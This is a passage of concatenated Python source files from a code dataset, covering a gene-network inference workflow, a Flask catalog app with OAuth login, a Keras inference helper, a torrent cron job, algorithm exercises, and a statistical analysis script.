self.filter_method = filter_method\n\n if 1 >= threshold >= 0:\n self.threshold = threshold\n else:\n raise ValueError(\"Threshold must be a float in the interval [0, 1]\")\n\n if tasks_names is not None:\n self.tasks_names = tasks_names\n\n def summarize_network(self, output_dir, gold_standard, priors, confidence_threshold=default.DEFAULT_CONF,\n precision_threshold=default.DEFAULT_PREC):\n \"\"\"\n Take the betas and rescaled beta_errors, construct a network, and test it against the gold standard\n :param output_dir: str\n Path to write files into. 
Don't write anything if this is None.\n :param gold_standard: pd.DataFrame [G x K]\n Gold standard to test the network against\n :param priors: pd.DataFrame [G x K]\n Prior data\n :param confidence_threshold: float\n :param precision_threshold: float\n :return aupr: float\n Returns the AUPR calculated from the network and gold standard\n :return stable_interactions: int\n Number of interactions with a combined confidence over confidence_threshold\n :return precision_interactions: int\n Number of interactions with a combined confidence over the precision from precision_threshold\n \"\"\"\n\n overall_confidences = []\n overall_resc_betas = []\n overall_sign = pd.DataFrame(np.zeros(self.betas[0][0].shape), index=self.betas[0][0].index,\n columns=self.betas[0][0].columns)\n overall_threshold = overall_sign.copy()\n\n for task_id, task_dir in enumerate(self.tasks_names):\n pr_calc = results_processor.RankSummaryPR(self.rescaled_betas[task_id], gold_standard,\n filter_method=self.filter_method)\n task_threshold, task_sign, task_nonzero = self.threshold_and_summarize(self.betas[task_id], self.threshold)\n task_resc_betas_mean, task_resc_betas_median = self.mean_and_median(self.rescaled_betas[task_id])\n network_data = {'beta.sign.sum': task_sign, 'var.exp.median': task_resc_betas_median}\n\n # Pile up data\n overall_confidences.append(pr_calc.combined_confidences())\n overall_resc_betas.append(task_resc_betas_median)\n overall_sign += np.sign(task_sign)\n overall_threshold += task_threshold\n\n utils.Debug.vprint(\"Model AUPR:\\t{aupr}\".format(aupr=pr_calc.aupr), level=0)\n\n if self.write_task_files is True and output_dir is not None:\n self.write_output_files(pr_calc, os.path.join(output_dir, task_dir), priors, task_threshold,\n network_data)\n\n overall_pr_calc = results_processor.RankSummaryPR(overall_confidences, gold_standard,\n filter_method=self.filter_method)\n\n overall_threshold = (overall_threshold / len(overall_confidences) > self.threshold).astype(int)\n overall_resc_betas_mean, overall_resc_betas_median = self.mean_and_median(overall_resc_betas)\n network_data = {'beta.sign.sum': overall_sign, 'var.exp.median': overall_resc_betas_median}\n\n utils.Debug.vprint(\"Model AUPR:\\t{aupr}\".format(aupr=overall_pr_calc.aupr), level=0)\n\n self.write_output_files(overall_pr_calc, output_dir, priors, overall_threshold, network_data,\n threshold_network=False)\n\n # Calculate how many interactions are stable (are above the combined confidence threshold)\n stable_interactions = overall_pr_calc.num_over_conf_threshold(confidence_threshold)\n # Calculate how many interactions we should keep for our model (are above the precision threshold)\n precision_interactions = overall_pr_calc.num_over_precision_threshold(precision_threshold)\n\n return overall_pr_calc.aupr, stable_interactions, precision_interactions\n\n\nclass SingleCellMultiTask(single_cell_workflow.SingleCellWorkflow, single_cell_puppeteer_workflow.PuppeteerWorkflow):\n \"\"\"\n Class that implements AMuSR multitask learning for single cell data\n\n Extends SingleCellWorkflow\n Inherits from PuppeteerWorkflow so that task preprocessing can be done more easily\n \"\"\"\n regression_type = amusr_regression\n prior_weight = 1.\n task_expression_filter = \"intersection\"\n\n # Task-specific data\n n_tasks = None\n task_design = []\n task_response = []\n task_meta_data = []\n task_bootstraps = []\n tasks_names = []\n\n # Axis labels to keep\n targets = None\n regulators = None\n\n def startup_finish(self):\n # If the expression matrix is 
[G x N], transpose it for preprocessing\n if not self.expression_matrix_columns_are_genes:\n self.expression_matrix = self.expression_matrix.transpose()\n\n # Filter expression and priors to align\n self.filter_expression_and_priors()\n self.separate_tasks_by_metadata()\n self.process_task_data()\n\n def align_priors_and_expression(self):\n pass\n\n def separate_tasks_by_metadata(self, meta_data_column=default.DEFAULT_METADATA_FOR_BATCH_CORRECTION):\n \"\"\"\n Take a single expression matrix and break it into multiple dataframes based on meta_data. Reset the\n self.expression_matrix and self.meta_data with a list of dataframes, self.n_tasks with the number of tasks,\n and self.tasks_names with the name from meta_data for each task.\n\n :param meta_data_column: str\n Meta_data column which corresponds to task ID\n\n \"\"\"\n\n task_name, task_data, task_metadata = [], [], []\n\n for task in self.meta_data[meta_data_column].unique():\n task_idx = self.meta_data[meta_data_column] == task\n task_data.append(self.expression_matrix.loc[:, task_idx])\n task_metadata.append(self.meta_data.loc[task_idx, :])\n task_name.append(task)\n\n self.n_tasks = len(task_data)\n self.expression_matrix = task_data\n self.meta_data = task_metadata\n self.tasks_names = task_name\n\n utils.Debug.vprint(\"Separated data into {ntask} tasks\".format(ntask=self.n_tasks), level=0)\n\n def process_task_data(self):\n \"\"\"\n Preprocess the individual task data using a child worker into task design and response data. Set\n self.task_design, self.task_response, self.task_meta_data, self.task_bootstraps with lists which contain\n DataFrames.\n\n Also set self.regulators and self.targets with pd.Indexes that correspond to the genes and tfs to model\n This is chosen based on the filtering strategy set in self.task_expression_filter\n \"\"\"\n\n self.task_design, self.task_response, self.task_meta_data, self.task_bootstraps = [], [], [], []\n targets, regulators = [], []\n\n for expr_data, meta_data in zip(self.expression_matrix, self.meta_data):\n task = self.new_puppet(expr_data, meta_data, seed=self.random_seed)\n task.startup_finish()\n self.task_design.append(task.design)\n self.task_response.append(task.response)\n self.task_meta_data.append(task.meta_data)\n self.task_bootstraps.append(task.get_bootstraps())\n\n regulators.append(task.design.index)\n targets.append(task.response.index)\n\n self.targets = amusr_regression.filter_genes_on_tasks(targets, self.task_expression_filter)\n self.regulators = amusr_regression.filter_genes_on_tasks(regulators, self.task_expression_filter)\n self.expression_matrix = None\n\n utils.Debug.vprint(\"Processed data into design/response [{g} x {k}]\".format(g=len(self.targets),\n k=len(self.regulators)), level=0)\n\n def emit_results(self, betas, rescaled_betas, gold_standard, priors_data):\n \"\"\"\n Output result report(s) for workflow run.\n \"\"\"\n if self.is_master():\n self.create_output_dir()\n rp = ResultsProcessorMultiTask(betas, rescaled_betas, filter_method=self.gold_standard_filter_method,\n tasks_names=self.tasks_names)\n results = rp.summarize_network(self.output_dir, gold_standard, priors_data)\n self.aupr, self.n_interact, self.precision_interact = results\n else:\n self.aupr, self.n_interact, self.precision_interact = None, None, None\n","sub_path":"inferelator_ng/amusr_workflow.py","file_name":"amusr_workflow.py","file_ext":"py","file_size_in_byte":10013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} 
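# A minimal illustrative sketch (added; not one of the dataset entries) of the
# rank-combining idea described in ResultsProcessorMultiTask.summarize_network
# above: per-task confidence matrices are converted to normalized ranks and
# averaged. The function name and the plain pandas/numpy approach are
# assumptions for illustration, not the inferelator_ng API.
import numpy as np
import pandas as pd

def combine_task_confidences(task_matrices):
    """Average normalized per-task ranks into one combined confidence matrix."""
    ranked = []
    for mat in task_matrices:
        flat = mat.abs().values.flatten()
        # rank every interaction within its own task, scaled into [0, 1]
        ranks = pd.Series(flat).rank(method="average") / len(flat)
        ranked.append(ranks.values.reshape(mat.shape))
    # element-wise mean of the normalized rank matrices across tasks
    combined = np.mean(ranked, axis=0)
    return pd.DataFrame(combined, index=task_matrices[0].index,
                        columns=task_matrices[0].columns)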
+{"seq_id":"185720709","text":"#!/usr/bin/env python3\nfrom flask import Flask, render_template, request, redirect, jsonify, url_for,\\\n flash\n\nfrom sqlalchemy import create_engine, asc, desc\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Category, Item, User\n\nfrom flask import session as login_session\nimport random\nimport string\n\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.client import FlowExchangeError\nimport httplib2\nimport json\nfrom flask import make_response\nimport requests\n\napp = Flask(__name__)\nCLIENT_ID = json.loads(\n open('client_secrets.json', 'r').read())['web']['client_id']\n\n# Connect database and create database session\nengine = create_engine('sqlite:///project.db')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n\n# Login page (login with FB or Google)\n@app.route('/login')\ndef showLogin():\n # create a session state\n state = ''.join(random.choice(string.ascii_uppercase + string.digits) for\n x in range(32))\n login_session['state'] = state\n return render_template('login.html', STATE=state)\n\n\n# Login for google\n@app.route('/gconnect', methods=['POST'])\ndef gconnect():\n # Check the login state matches the state sent through request\n if request.args.get('state') != login_session['state']:\n response = make_response(json.dumps('Invalid state'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n code = request.data\n try:\n # Upgrade the authorization code into a credentials object.\n oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')\n oauth_flow.redirect_uri = 'postmessage'\n credentials = oauth_flow.step2_exchange(code)\n except FlowExchangeError:\n response = make_response(json.dumps\n ('Failed to upgrade the authorization code.'))\n response.headers['Content-Type'] = 'application/json'\n return response\n\n access_token = credentials.access_token\n url = 'https://www.googleapis.com/oauth2/v1/'\n url += 'tokeninfo?access_token=%s' % access_token\n h = httplib2.Http()\n result = json.loads(h.request(url, 'GET')[1].decode('utf-8'))\n\n # Check for error in access_token\n if result.get('error') is not None:\n response = make_response(json.dumps(result.get('error')), 500)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is used for the intended user.\n gplus_id = credentials.id_token['sub']\n if result['user_id'] != gplus_id:\n response = make_response(\n json.dumps(\"Token's user ID doesn't match given user ID.\"), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is valid for this app.\n if result['issued_to'] != CLIENT_ID:\n response = make_response(\n json.dumps(\"Token's client ID does not match app's.\"), 401)\n print (\"Token's client ID does not match app's.\")\n response.headers['Content-Type'] = 'application/json'\n return response\n\n stored_credentials = login_session.get('credentials')\n stored_gplus_id = login_session.get('gplus_id')\n # Check to see if user is already connected.\n if stored_credentials is not None and gplus_id == stored_gplus_id:\n response = make_response(\n json.dumps('Current user is already connected.'), 200)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n login_session['provider'] = \"google\"\n login_session['credentials'] = credentials.access_token\n login_session['gplus_id'] = gplus_id\n\n # Get user 
info\n userinfo_url = \"https://www.googleapis.com/oauth2/v1/userinfo\"\n params = {'access_token': credentials.access_token, 'alt': 'json'}\n answer = requests.get(userinfo_url, params=params)\n data = answer.json()\n\n login_session['username'] = data['name']\n login_session['picture'] = data['picture']\n login_session['email'] = data['email']\n\n user_id = getUserID(login_session['email'])\n if user_id is None:\n user_id = createUser(login_session)\n login_session['user_id'] = user_id\n print(user_id)\n\n output = ''\n output += '
<h1>Welcome, '\n    output += login_session['username']\n    output += '!</h1>
'\n output += ' '''\n\n flash(\"You are now logged in as %s\" % login_session['username'])\n print (\"done!\")\n return output\n\n\n# Disconnect from google\n@app.route(\"/gdisconnect\")\ndef gdisconnect():\n access_token = \"\"\n access_token = login_session['credentials']\n # Check to see if user is connected.\n if access_token is None:\n response = make_response(\n json.dumps('Current user not connected.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Revoke access token\n url = 'https://accounts.google.com/o/oauth2/revoke?token=%s' % access_token\n h = httplib2.Http()\n result = h.request(url, 'GET')[0]\n\n if result['status'] == '200':\n del login_session['credentials']\n del login_session['gplus_id']\n del login_session['username']\n del login_session['email']\n del login_session['picture']\n\n response = make_response(\n json.dumps('Successfully disconnected.'), 200)\n response.headers['Content-Type'] = 'application/json'\n return response\n else:\n response = make_response(\n json.dumps('Failed to revoke token for given user.'), 400)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n\n# Connect to Facebook\n@app.route('/fbconnect', methods=['POST'])\ndef fbconnect():\n # Validate state token\n if request.args.get('state') != login_session['state']:\n response = make_response(json.dumps('Invalid state parameter.'), 401)\n response.headers['Content-Type'] = 'application.json'\n return response\n\n # Obtain short term token\n access_token = request.data.decode(\"utf-8\")\n\n app_id = json.loads(\n open('fb_client_secrets.json', 'r').read())['web']['app_id']\n app_secret = json.loads(\n open('fb_client_secrets.json', 'r').read())['web']['app_secret']\n url = 'https://graph.facebook.com/oauth/access_token?grant_type=fb_'\n url += 'exchange_token&client_id={}&client_secret={}&fb_exchange_token={}'\\\n .format(app_id, app_secret, access_token)\n\n # Obtain long term token\n h = httplib2.Http()\n result = h.request(url, 'GET')[1]\n data = json.loads(result.decode('utf-8'))\n userinfo_url = \"https://graph.facebook.com/v2.10/me\"\n token = 'access_token=' + data['access_token']\n\n # Obtain user info\n url = 'https://graph.facebook.com/v2.10/me?%s&fields=name,id,email' % token\n h = httplib2.Http()\n result = json.loads(h.request(url, 'GET')[1].decode('utf-8'))\n\n login_session['provider'] = \"facebook\"\n login_session['username'] = result['name']\n login_session['facebook_id'] = result['id']\n login_session['email'] = result['email']\n login_session['credentials'] = access_token\n\n # Obtain profile picture\n url = 'https://graph.facebook.com/v2.10/me/picture?%s&' % token\n url += 'redirect=0&height=200&width=200'\n print(url)\n h = httplib2.Http()\n result = json.loads(h.request(url, 'GET')[1].decode('utf-8'))\n\n login_session['picture'] = result['data']['url']\n\n user_id = getUserID(login_session['email'])\n if user_id is None:\n user_id = createUser(login_session)\n login_session['user_id'] = user_id\n print(login_session['user_id'])\n\n output = ''\n output += '
Welcome, '\n output += login_session['username']\n output += '!
'\n output += ' '''\n\n flash(\"You are now logged in as %s\" % login_session['username'])\n print (\"done!\")\n return output\n\n\n# Disconnect from Facebook\n@app.route('/fbdisconnect')\ndef fbdisconnect():\n facebook_id = login_session['facebook_id']\n url = 'https://graph.facebook.com/%s/permissions' % facebook_id\n h = httplib2.Http()\n result = h.request(url, 'DELETE')[1]\n del login_session['username']\n del login_session['email']\n del login_session['picture']\n del login_session['user_id']\n del login_session['facebook_id']\n return \"you have been logged out\"\n\n\n# Handle disconnect for both FB and google.\n@app.route('/disconnect')\ndef disconnect():\n if 'provider' in login_session:\n if login_session['provider'] == \"google\":\n gdisconnect()\n\n elif login_session['provider'] == \"facebook\":\n fbdisconnect()\n\n del login_session['provider']\n flash(\"Successfully Disconnected\")\n return redirect('/')\n else:\n return redirect('/')\n\n\n# Return catalog info in JSON\n@app.route('/catalog/JSON')\ndef catalogJSON():\n categories = session.query(Category).all()\n return jsonify(categories=[i.serialize for i in categories])\n\n\n# Return Item information in JSON\n@app.route('/catalog//items/JSON')\ndef categoryItemsJSON(category_id):\n items = session.query(Item).filter_by(category_id=category_id).all()\n return jsonify(Items=[i.serialize for i in items])\n\n\n# Show home catalog home page and latest items.\n@app.route('/')\n@app.route('/catalog/')\ndef showCatalog():\n categories = session.query(Category).order_by(asc(Category.id))\n items = session.query(Item).order_by(desc(Item.id))\n if 'username' not in login_session:\n return render_template(\n 'public_catalog.html', categories=categories, items=items)\n else:\n return render_template(\n 'catalog.html', categories=categories, items=items)\n\n\n# Show specific category with items.\n@app.route('/catalog//')\n@app.route('/catalog//items/')\ndef showItems(category_id):\n categories = session.query(Category).order_by(asc(Category.id))\n category = session.query(Category).filter_by(id=category_id).one()\n items = session.query(Item).filter_by(category_id=category_id).all()\n if 'username' not in login_session:\n return render_template(\n 'public_items.html', category=category,\n categories=categories, items=items)\n else:\n current = getUserInfo(login_session['user_id'])\n creator = getUserInfo(category.user_id)\n return render_template(\n 'items.html', category=category, categories=categories,\n items=items, current=current, creator=creator)\n\n\n# Show specific item and description\n@app.route('/catalog///')\ndef showItem(category_id, item_id):\n item = session.query(Item).filter_by(id=item_id).one()\n if 'username' not in login_session:\n return render_template('public_showItem.html', item=item)\n else:\n current = getUserInfo(login_session['user_id'])\n creator = getUserInfo(item.user_id)\n return render_template(\n 'showItem.html', item=item, current=current, creator=creator)\n\n\n# Create a new category\n@app.route('/catalog/new/', methods=['GET', 'POST'])\ndef newCategory():\n if 'username' not in login_session:\n return redirect('/login')\n else:\n if request.method == 'POST':\n newCategory = Category(name=request.form['name'],\n user_id=login_session['user_id'])\n session.add(newCategory)\n session.commit()\n flash('New Category Successfully Created')\n return redirect(url_for('showCatalog'))\n else:\n return render_template('addCategory.html')\n\n\n# Edit category details\n@app.route('/catalog//edit/', 
methods=['GET', 'POST'])\ndef editCategory(category_id):\n category = session.query(Category).filter_by(id=category_id).one()\n if 'username' not in login_session:\n return redirect('/login')\n elif category.user_id != login_session['user_id']:\n return \"\"\"\"\"\"\n else:\n if request.method == 'POST':\n if request.form['name']:\n category.name = request.form['name']\n session.add(category)\n session.commit()\n flash('%s Successfully Updated' % category.name)\n return redirect(url_for('showItems', category_id=category_id))\n else:\n return render_template('editCatalog.html', category=category)\n\n\n# Delete category\n@app.route('/catalog//delete/', methods=['GET', 'POST'])\ndef deleteCategory(category_id):\n category = session.query(Category).filter_by(id=category_id).one()\n if 'username' not in login_session:\n return redirect('/login')\n elif category.user_id != login_session['user_id']:\n return \"\"\"\"\"\"\n else:\n if request.method == 'POST':\n session.delete(category)\n flash('%s Successfully Deleted' % category.name)\n session.commit()\n return redirect(url_for('showCatalog'))\n else:\n return render_template('deleteCatalog.html', category=category)\n\n\n# Add a new item\n@app.route('/catalog//items/new/', methods=['GET', 'POST'])\ndef newItem(category_id):\n if 'username' not in login_session:\n return redirect('/login')\n else:\n if request.method == 'POST':\n newItem = Item(name=request.form['name'],\n description=request.form['description'],\n category_id=category_id,\n user_id=login_session['user_id'])\n session.add(newItem)\n session.commit()\n flash('New Item Successfully Created')\n return redirect(url_for('showItems', category_id=category_id))\n else:\n return render_template('addItem.html', category_id=category_id)\n\n\n# Edit item details\n@app.route('/catalog///edit/',\n methods=['GET', 'POST'])\ndef editItem(category_id, item_id):\n item = session.query(Item).filter_by(id=item_id).one()\n if 'username' not in login_session:\n return redirect('/login')\n elif item.user_id != login_session['user_id']:\n return \"\"\"\"\"\"\n else:\n if request.method == 'POST':\n if request.form['name']:\n item.name = request.form['name']\n if request.form['description']:\n item.description = request.form['description']\n session.add(item)\n session.commit()\n flash('%s Successfully Updated' % item.name)\n return redirect(\n url_for('showItem', category_id=category_id, item_id=item_id))\n else:\n return render_template('editItem.html', item=item)\n\n\n# Delete an item\n@app.route('/catalog///delete/',\n methods=['GET', 'POST'])\ndef deleteItem(category_id, item_id):\n item = session.query(Item).filter_by(id=item_id).one()\n category = session.query(Category).filter_by(id=category_id).one()\n if 'username' not in login_session:\n return redirect('/login')\n elif item.user_id != login_session['user_id']:\n return \"\"\"\"\"\"\n else:\n if request.method == 'POST':\n session.delete(item)\n flash('%s Succesfully Deleted' % item.name)\n session.commit()\n return redirect(url_for('showItems', category_id=category_id))\n else:\n return render_template(\n 'deleteItem.html', item=item, category=category)\n\n\n# Adding new user to the database.\ndef createUser(login_session):\n newUser = User(name=login_session['username'],\n email=login_session['email'],\n picture=login_session['picture'])\n session.add(newUser)\n session.commit()\n user = session.query(User).filter_by(email=login_session['email']).one()\n return user.id\n\n\n# Obtaining user info\ndef getUserInfo(user_id):\n user = 
session.query(User).filter_by(id=user_id).one()\n    return user\n\n\n# Obtaining user ID\ndef getUserID(email):\n    try:\n        user = session.query(User).filter_by(email=email).one()\n        return user.id\n    except Exception:\n        return None\n\n\nif __name__ == '__main__':\n    app.secret_key = 'super_secret_key'\n    app.debug = True\n    app.run(host='0.0.0.0', port=5000)\n","sub_path":"Backend/Item Catalog/vagrant/catalog/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":17421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"75328780","text":"from keras.models import model_from_json\nfrom pandas import read_csv\nfrom sklearn.preprocessing import Normalizer\nfrom numpy import expand_dims,zeros\nfrom SaiErNetwork.Identify.Config import *\nfrom numpy import argmax\nclass StartIdentify():\n    def __init__(self,model=None,data=None):\n        if data is not None:\n            self.data = data\n\n        if model is not None:\n            y = self.getData()\n            self.result = self.getResult(y,model)\n\n    def getData(self,path = rootdir+'test23.csv'):\n        test_data = read_csv(path, header=None)\n        # # Test portion of the test set\n        test = test_data.iloc[:, 0:15]\n        # # Normalize the test set\n        scaler = Normalizer().fit(test)\n        x_test = scaler.transform(test)\n        # # Get the test set; it has no labels\n        y = expand_dims(x_test, axis=2)\n        return y\n\n    def getResult(self,y,model):\n        # Predict; returns a list whose maximum value marks the result position\n        preds = model.predict(y)\n        # print(preds)\n        # Check a single sample\n        k = max(preds[0])\n        # print(k)\n        # 1.7390638e-03\n        for i in range(len(preds[0])):\n            if preds[0][i] == k:\n                return i\n\n    def SaveResult(self):\n        results = str(self.data)+\" \"+str(self.result)\n        with open(rootdir+\"/Result.txt\",'a') as file:\n            file.write(results)\n            file.write('\\n')\n\n\n    def Strtolist(self,text):\n        TeZheng = text.split(',')\n        return TeZheng\n\n\ndef LoadModel():\n    # Load the model architecture from JSON\n    my_model = model_from_json(open(rootdir+'Network_Mode_Json1.json').read())\n    # Load the weights\n    my_model.load_weights(rootdir+'Network_Mode_Weight1.h5')\n\n    my_model.predict(StartIdentify().getData(path=rootdir+'test234.csv'))\n    return my_model\n","sub_path":"Ryu_migration_test/SaiErNetwork/Identify/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"228636994","text":"import click\nimport os\nimport django\n\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"cloud_project.settings\")\ndjango.setup()\n\n\nimport logging\n\nfrom torrents.utils.processors import check_done_torrents, add_new_torrents, check_dead_torrents\nfrom torrents.utils.transmission import tr_client\nfrom systemd.journal import JournaldLogHandler\n\nlogging.basicConfig(format=u'%(filename)s[LINE:%(lineno)d]# %(levelname)-8s [%(asctime)s] %(message)s',\n level=logging.INFO)\n\nlog = logging.getLogger('own.torrents.add-cron')\nlog.addHandler(JournaldLogHandler())\nlog.setLevel(logging.INFO)\n\n\n@click.command()\n@click.option('--add', is_flag=True)\n@click.option('--check_done', is_flag=True)\n@click.option('--check_dead', is_flag=True)\ndef main(add, check_done, check_dead):\n    tr_torrents = tr_client.get_torrents()\n    if add:\n        add_new_torrents(tr_torrents)\n    if check_done:\n        check_done_torrents(tr_torrents)\n    if check_dead:\n        check_dead_torrents(tr_torrents)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"torrents/cron/add_torrents.py","file_name":"add_torrents.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
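A narrower error-handling variant of the getUserID helper above: SQLAlchemy's .one() raises NoResultFound when no row matches, so catching only that exception keeps unrelated database errors (a dropped connection, a bad schema) visible instead of silently returning None. A minimal sketch, assuming the same session and User model that project.py already defines; the name get_user_id is illustrative:

from sqlalchemy.orm.exc import NoResultFound

def get_user_id(email):
    # Return the id of the user with this email, or None when absent.
    # Only the "no matching row" case is treated as a normal outcome;
    # every other exception still propagates to the caller.
    try:
        return session.query(User).filter_by(email=email).one().id
    except NoResultFound:
        return None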
+{"seq_id":"123622841","text":"\"\"\"\nhttps://leetcode.com/problems/maximum-profit-of-operating-a-centennial-wheel/\n\nSimulation.\nTime Comlexity: O(sum(customer)/4)\n\"\"\"\nclass Solution:\n def minOperationsMaxProfit(self, customers: List[int], boardingCost: int, runningCost: int) -> int:\n queue_customer = 0\n total_profit = [0]\n for c in customers:\n queue_customer += c\n n_board = min(4, queue_customer)\n queue_customer -= n_board\n total_profit.append(total_profit[-1] + n_board * boardingCost - runningCost)\n\n while queue_customer > 0:\n n_board = min(4, queue_customer)\n queue_customer -= n_board\n total_profit.append(total_profit[-1] + n_board * boardingCost - runningCost)\n\n max_profit = max(total_profit)\n if max_profit <= 0:\n return -1\n else:\n for i, p in enumerate(total_profit):\n if p == max_profit:\n return i\n","sub_path":"1599_MaximumProfitOfOperatingACentennialWheel.py","file_name":"1599_MaximumProfitOfOperatingACentennialWheel.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"298363309","text":"####### Fibonacci sequency #######\n# 1, 1, 2, 3, 5, 8, 13, 21, 34 .....\n\ndef check_number_for_fibonacci_calc(n):\n if type(n) != int:\n raise TypeError(\"The value must be a Integer\")\n if n < 1:\n raise ValueError(\"The value must be a positive Integer\")\n \n\n# calculate fibonacci given a number\ndef fibonacci(n):\n check_number_for_fibonacci_calc(n)\n if n == 1:\n return 1\n elif n == 2:\n return 1\n elif n > 2:\n return fibonacci(n-1) + fibonacci(n-2)\n\n\n# # Test function\n# for n in range(1,11):\n# print(n, \" > \", fibonacci(n))\n\n\n########## Apply explicitly memoization #######\nfibonacci_cache = {}\ndef fibonacci_optimized(n):\n check_number_for_fibonacci_calc(n)\n # if the value was computed\n if n in fibonacci_cache:\n return fibonacci_cache[n]\n \n # compute the new value\n if n == 1:\n return 1\n elif n == 2:\n return 1\n elif n > 2:\n value = fibonacci_optimized(n-1) + fibonacci_optimized(n-2)\n\n fibonacci_cache[n] = value\n return value\n\n\n# # Test function optimized\n# for n in range(1,101):\n# print(n, \" > \", fibonacci_optimized(n))\n\n\n########## Apply LRU cache #######\nfrom functools import lru_cache\n\n@lru_cache(maxsize = 1000)\ndef fibonacci_cached(n):\n check_number_for_fibonacci_calc(n)\n if n == 1:\n return 1\n elif n == 2:\n return 1\n elif n > 2:\n return fibonacci_cached(n - 1) + fibonacci_cached(n - 2)\n\n# # Test function cached\n# for n in range(1,201):\n# print(n, \" > \", fibonacci_cached(n))\n\n\n# Fibonacci division\nfor n in range(1,41):\n print(n, \" > \", fibonacci_cached(n+1) / fibonacci_cached(n))\n","sub_path":"python/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"370309172","text":"# -*- coding: utf-8 -*-\n# %% 配置\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport scipy.stats as st\nimport scipy.stats as stats\nimport statsmodels.api as sm\nimport matplotlib.pylab as plt\nfrom sklearn.preprocessing import OneHotEncoder\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\n\n\n# %% 读取数据\ndef read_and_chop(file_name, sheet_name, **kwargs) -> pd.DataFrame:\n \"\"\"读取并截取有效数据\"\"\"\n df = pd.read_excel(file_name, sheet_name=sheet_name, **kwargs)\n if df.iloc[-1, 0] == '数据来源:Wind':\n df = df.iloc[:-2]\n return df\n\n\ndf = 
read_and_chop('样本数据.xlsx', 'V1')\n# 输出的IO\noutput_name = '样本数据统计分析.xlsx'\noutput_io = pd.ExcelWriter(output_name)\n\n# %% 分行业情况\n# 行业数为1的记为其他\nindu_count_df = df.groupby(by='INDU')['INDU'].count()\nfor indu in indu_count_df.index[indu_count_df <= 1]:\n df.loc[df['INDU'] == indu, 'INDU'] = '其他'\n# 全样本的分行业情况\nindu_count_df = df.groupby(by='INDU')['INDU'].count()\nindu_count_df.to_excel(output_io, '分行业情况', startrow=0, startcol=0, index_label='全样本')\n# PE_YES = 1的分行业情况\nindu_pe_count_df = df[df['PE_YES'] == 1].groupby(by='INDU')['INDU'].count()\nindu_pe_count_df.to_excel(output_io, '分行业情况', startrow=indu_count_df.shape[0] + 2, startcol=0, index_label='PE_YES = 1')\n\n# %% 描述性统计\n# 连续变量CLIP\nclip_cols = [\n 'RELATIVE SIZE',\n 'LN_ASSET',\n 'LEV',\n 'BROE',\n 'GROWTH',\n 'FCFF',\n 'BLOCK',\n 'PE_RATIO',\n 'PE_TIME',\n 'STATE_OVER_PE_RATIO',\n]\nstart_row = 0\ndf[clip_cols] = df[clip_cols].clip(*np.percentile(df[clip_cols], [1, 99], axis=0), axis=1)\ndes_df = df.describe().T\ndes_df = des_df.drop(index='YEAR')\ndes_df.to_excel(output_io, '描述性统计', startrow=start_row, startcol=0, index_label='全样本')\nstart_row += des_df.shape[0] + 2\n# PE_YES = 1\npe_yes_df = df[df['PE_YES'] == 1]\ndes_pe_yes_df = pe_yes_df.describe().T\ndes_pe_yes_df = des_pe_yes_df.drop(index='YEAR')\ndes_pe_yes_df.to_excel(output_io, '描述性统计', startrow=start_row, startcol=0, index_label='PE_YES = 1')\nstart_row += des_pe_yes_df.shape[0] + 2\n# PE_YES = 0\nno_pe_yes_df = df[df['PE_YES'] == 0]\ndes_no_pe_yes_df = no_pe_yes_df.describe().T\ndes_no_pe_yes_df = des_no_pe_yes_df.drop(index='YEAR')\ndes_no_pe_yes_df.to_excel(output_io, '描述性统计', startrow=start_row, startcol=0, index_label='PE_YES = 0')\nstart_row += des_no_pe_yes_df.shape[0] + 2\n# t检验\nt_test = pd.DataFrame(\n index=des_df.index,\n columns=pd.MultiIndex.from_product([['PE_YES = 1', 'PE_YES = 0'], ['nobs', 'mean', 'std']]).append(\n pd.MultiIndex.from_product([['t_test'], ['stat', 'p_value']])\n ),\n)\nt_test[('PE_YES = 1', 'nobs')] = des_pe_yes_df['count']\nt_test[('PE_YES = 1', 'mean')] = des_pe_yes_df['mean']\nt_test[('PE_YES = 1', 'std')] = des_pe_yes_df['std']\nt_test[('PE_YES = 0', 'nobs')] = des_no_pe_yes_df['count']\nt_test[('PE_YES = 0', 'mean')] = des_no_pe_yes_df['mean']\nt_test[('PE_YES = 0', 'std')] = des_no_pe_yes_df['std']\nt_test[('t_test', 'stat')], t_test[('t_test', 'p_value')] = st.ttest_ind_from_stats(\n mean1=t_test[('PE_YES = 1', 'mean')],\n std1=t_test[('PE_YES = 1', 'std')],\n nobs1=t_test[('PE_YES = 1', 'nobs')],\n mean2=t_test[('PE_YES = 0', 'mean')],\n std2=t_test[('PE_YES = 0', 'std')],\n nobs2=t_test[('PE_YES = 0', 'nobs')],\n equal_var=True,\n)\nt_test.to_excel(output_io, '描述性统计', startrow=start_row, startcol=0, index_label='t_test')\n\n\n# %% 相关性分析\ndef get_stars(p_value):\n \"\"\"***、**、*分别表示在 1%、5%、10%的水平上统计显著\"\"\"\n return '***' if p_value < 0.01 else '**' if p_value < 0.05 else 